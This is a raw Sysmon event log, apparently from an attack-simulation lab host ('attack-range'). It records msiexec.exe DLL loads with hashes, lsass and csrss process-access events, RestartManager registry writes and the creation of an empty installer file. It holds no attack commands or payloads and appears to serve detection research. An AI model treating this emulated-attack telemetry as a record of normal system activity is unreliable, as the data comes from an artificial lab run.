15:05:09.162{7CF983DC-9825-62AC-256B-000000006202}4764C:\Windows\System32\msiexec.exeC:\Windows\System32\rpcrt4.dll10.0.14393.5127 (rs1_release_inmarket.220514-1756)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=920CEBB474555470F1FFB129AD6E19D8,SHA256=DE1C8EA3EF80E7A0E42664559AF3B29FE89E29189382AFC0B438D9C21E2D909AtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002693508Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.162{7CF983DC-9825-62AC-256B-000000006202}4764C:\Windows\System32\msiexec.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002693507Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.162{7CF983DC-9825-62AC-256B-000000006202}4764C:\Windows\System32\msiexec.exeC:\Windows\System32\combase.dll10.0.14393.5127 (rs1_release_inmarket.220514-1756)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=148F67CE7413EB2D4D777030DFCCD28B,SHA256=5CBD4E213A26B9D8BE56677946D294F65FC615D710F8E07909B643D437819161trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002693506Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.162{7CF983DC-9825-62AC-256B-000000006202}4764C:\Windows\System32\msiexec.exeC:\Windows\System32\shlwapi.dll10.0.14393.5125 (rs1_release.220429-1732)Shell Light-weight Utility LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationSHLWAPI.DLLMD5=407E895A220DE1A60C5B555A113FE998,SHA256=FE184347784F83953457146562E0F6C87C8DA04D0288415465631325A2A98C92trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002693505Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.162{7CF983DC-9825-62AC-256B-000000006202}4764C:\Windows\System32\msiexec.exeC:\Windows\System32\gdi32full.dll10.0.14393.5127 (rs1_release_inmarket.220514-1756)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=F284A98093B423946252259D7D2857D3,SHA256=193F70529B68EF108EA17ABC069E6DACF4541A547DF1D2F249F7555A58BCFA07trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002693504Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.162{7CF983DC-9825-62AC-256B-000000006202}4764C:\Windows\System32\msiexec.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002693503Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.162{7CF983DC-9825-62AC-256B-000000006202}4764C:\Windows\System32\msiexec.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002693502Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.162{7CF983DC-9825-62AC-256B-000000006202}4764C:\Windows\System32\msiexec.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002693501Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.162{7CF983DC-9825-62AC-256B-000000006202}4764C:\Windows\System32\msiexec.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002693500Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.147{7CF983DC-9825-62AC-256B-000000006202}4764C:\Windows\System32\msiexec.exeC:\Windows\AppPatch\apppatch64\AcLayers.dll10.0.14393.2879 (rs1_release_inmarket.190313-1855)Windows Compatibility DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationACLAYERS.DLLMD5=18D8E2D6C17577D91A40C4A5AD9F6E37,SHA256=9E9CF9446EDA1F064E996F2022DBD3B3C7D6778574EA790B2B0412EA41C5F5F0trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002693499Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.147{7CF983DC-9825-62AC-256B-000000006202}4764C:\Windows\System32\msiexec.exeC:\Windows\System32\apphelp.dll10.0.14393.4350 (rs1_release.210407-2154)Application Compatibility Client LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationApphelpMD5=92330FA0551BFFBB8C1C97E86F9A0264,SHA256=0F341AF375236EBF7047F6AE50F2834566F0D859F0F02B8A5FFD7F29C31B0117trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002693498Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.131{7CF983DC-EE97-62A8-7E00-000000006202}18083264C:\Windows\system32\csrss.exe{7CF983DC-9825-62AC-256B-000000006202}4764C:\Windows\System32\MsiExec.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179fNT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 734700x80000000000000002693497Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.131{7CF983DC-9825-62AC-256B-000000006202}4764C:\Windows\System32\msiexec.exeC:\Windows\System32\KernelBase.dll10.0.14393.5125 (rs1_release.220429-1732)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=D8F18C830B03B0D60C10093ECB020E60,SHA256=CF0D33CEC46BB41C6F5693A84491ACD7F7CBECB429BA6C47AB5A170D4DF3484FtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002693496Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.131{7CF983DC-9825-62AC-256B-000000006202}4764C:\Windows\System32\msiexec.exeC:\Windows\System32\kernel32.dll10.0.14393.5127 (rs1_release_inmarket.220514-1756)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=92D599E644B89C0F9E7DDB55762EBEA6,SHA256=F32D28EE73EADAF9EF3F30145FA3C52B88DF47236B8747434750832BF1B9CDEEtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002693495Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.131{7CF983DC-9825-62AC-256B-000000006202}4764C:\Windows\System32\msiexec.exeC:\Windows\System32\ntdll.dll10.0.14393.5006 (rs1_release.220301-1704)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F5EE39B17A8BCDEDC3D40997C26F62B1,SHA256=11C1C88B1CC11D9800DEEF27ED7ABDFDE3DC852687A3B9FBD5153284106E5952trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002693494Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.131{7CF983DC-9825-62AC-256B-000000006202}4764C:\Windows\System32\msiexec.exeC:\Windows\System32\msiexec.exe5.0.14393.2430 (rs1_release_inmarket_aim.180806-1810)Windows® installerWindows Installer - UnicodeMicrosoft Corporationmsiexec.exeMD5=F10B3635225BE24A677CB3BB71824D07,SHA256=B5D755B0B561AA8FDAFF156E3715A333179B14C171EFB53392D4D806D14CF9C9trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002693493Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.131{7CF983DC-EE55-62A8-0500-000000006202}396512C:\Windows\system32\csrss.exe{7CF983DC-9825-62AC-256B-000000006202}4764C:\Windows\System32\MsiExec.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179fNT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002693492Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.131{7CF983DC-981D-62AC-1A6B-000000006202}48402928C:\Windows\system32\msiexec.exe{7CF983DC-9825-62AC-256B-000000006202}4764C:\Windows\System32\MsiExec.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6f523|C:\Windows\System32\ADVAPI32.dll+189bf|C:\Windows\system32\Msi.dll+ba6c8|C:\Windows\system32\Msi.dll+16e294|C:\Windows\system32\Msi.dll+16e90c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 154100x80000000000000002693491Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.137{7CF983DC-9825-62AC-256B-000000006202}4764C:\Windows\System32\msiexec.exe5.0.14393.2430 (rs1_release_inmarket_aim.180806-1810)Windows® installerWindows Installer - UnicodeMicrosoft Corporationmsiexec.exeC:\Windows\System32\MsiExec.exe -Embedding 033E360301F8EF9767AF61FB660F8D7FC:\Windows\system32\WIN-HOST-MHAAG-\Administrator{7CF983DC-EE99-62A8-FF22-070000000000}0x722ff2HighMD5=F10B3635225BE24A677CB3BB71824D07,SHA256=B5D755B0B561AA8FDAFF156E3715A333179B14C171EFB53392D4D806D14CF9C9{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\System32\msiexec.exeC:\Windows\system32\msiexec.exe /VNT AUTHORITY\SYSTEM 13241300x80000000000000002693490Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-SetValue2022-06-17 15:05:09.116{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\RestartManager\Session0000\SequenceDWORD (0x00000001)NT AUTHORITY\SYSTEM 12241200x80000000000000002693489Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-CreateKey2022-06-17 15:05:09.116{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\RestartManager\Session0000NT AUTHORITY\SYSTEM 13241300x80000000000000002693488Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-SetValue2022-06-17 15:05:09.116{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\RestartManager\Session0000\SessionHashBinary DataNT AUTHORITY\SYSTEM 13241300x80000000000000002693487Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-SetValue2022-06-17 15:05:09.116{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\RestartManager\Session0000\OwnerBinary DataNT AUTHORITY\SYSTEM 12241200x80000000000000002693486Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-CreateKey2022-06-17 15:05:09.116{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\RestartManager\Session0000NT AUTHORITY\SYSTEM 12241200x80000000000000002693485Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-CreateKey2022-06-17 15:05:09.116{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\RestartManager\Session0000NT AUTHORITY\SYSTEM 10341000x80000000000000002693484Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.100{7CF983DC-981D-62AC-1A6B-000000006202}48403316C:\Windows\system32\msiexec.exe{7CF983DC-9824-62AC-246B-000000006202}2292c:\windows\system32\msiexec.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\apphelp.dll+20ffd|C:\Windows\system32\apphelp.dll+209c1|C:\Windows\system32\Msi.dll+19fdbd|C:\Windows\system32\Msi.dll+2ea9e|C:\Windows\system32\Msi.dll+474f5|C:\Windows\system32\Msi.dll+10b3b5|C:\Windows\system32\Msi.dll+10a5d6|C:\Windows\system32\Msi.dll+f4b9f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 734700x80000000000000002693483Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.100{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\System32\msiexec.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\fusion.dll4.8.3761.0 built by: NET48REL1Assembly managerMicrosoft® .NET FrameworkMicrosoft Corporationfusion.dllMD5=2A73BA7551F7B631AA484CAABD372F06,SHA256=F876EEEC603221DCDD098D1E2A1118012254E9C67851E749DF61D573EA949F55trueMicrosoft CorporationValidNT AUTHORITY\SYSTEM 734700x80000000000000002693482Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.100{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\System32\msiexec.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll4.8.4180.0 built by: NET48REL1LAST_BMicrosoft .NET Runtime Execution EngineMicrosoft® .NET FrameworkMicrosoft Corporationmscoreei.dllMD5=899A8B655E52A061B33571D97C5C06ED,SHA256=DE05B03E37FB9BA5D74CF8FA36A6F0B15AB61705285B738BC90D14FDE580A45EtrueMicrosoft CorporationValidNT AUTHORITY\SYSTEM 734700x80000000000000002693481Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.100{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\System32\msiexec.exeC:\Windows\System32\mscoree.dll10.0.14393.0 (rs1_release.160715-1616)Microsoft .NET Runtime Execution EngineMicrosoft® Windows® Operating SystemMicrosoft Corporationmscoree.dllMD5=5ECE402D7E12EC3750D044BF3D878DF6,SHA256=3F02B1AE7B61BC36B04EA2B82ED79F112219F4E9668518030FF14B005E2C9BBCtrueMicrosoft WindowsValidNT AUTHORITY\SYSTEM 254200x80000000000000002693480Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.100{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeC:\Windows\Installer\e4f5143.msi2022-06-13 14:04:24.0002022-06-17 15:05:09.100NT AUTHORITY\SYSTEM 10341000x80000000000000002693479Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.100{7CF983DC-EE56-62A8-0B00-000000006202}6125036C:\Windows\system32\lsass.exe{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMNT AUTHORITY\SYSTEM 10341000x80000000000000002693478Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.100{7CF983DC-EE56-62A8-0B00-000000006202}6125036C:\Windows\system32\lsass.exe{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMNT AUTHORITY\SYSTEM 11241100x80000000000000002693477Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.100{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeC:\Windows\Installer\e4f5143.msi2022-06-17 15:05:09.100NT AUTHORITY\SYSTEM 23542300x80000000000000002693476Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.100{7CF983DC-981D-62AC-1A6B-000000006202}4840NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\Installer\e4f5143.msiMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855falsetrue 11241100x80000000000000002693475Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.100{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeC:\Windows\Installer\e4f5143.msi2022-06-17 15:05:09.100NT AUTHORITY\SYSTEM 10341000x80000000000000002693473Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.084{7CF983DC-EE56-62A8-0B00-000000006202}6125036C:\Windows\system32\lsass.exe{7CF983DC-9824-62AC-246B-000000006202}2292c:\windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002693472Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.084{7CF983DC-EE56-62A8-0B00-000000006202}6125036C:\Windows\system32\lsass.exe{7CF983DC-9824-62AC-246B-000000006202}2292c:\windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002693471Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.084{7CF983DC-EE56-62A8-0B00-000000006202}6125036C:\Windows\system32\lsass.exe{7CF983DC-9824-62AC-246B-000000006202}2292c:\windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002693470Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.084{7CF983DC-EE56-62A8-0B00-000000006202}6125036C:\Windows\system32\lsass.exe{7CF983DC-9824-62AC-246B-000000006202}2292c:\windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002693469Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.084{7CF983DC-EE56-62A8-0B00-000000006202}6125036C:\Windows\system32\lsass.exe{7CF983DC-9824-62AC-246B-000000006202}2292c:\windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002693468Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.084{7CF983DC-EE56-62A8-0B00-000000006202}6125036C:\Windows\system32\lsass.exe{7CF983DC-9824-62AC-246B-000000006202}2292c:\windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002693467Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 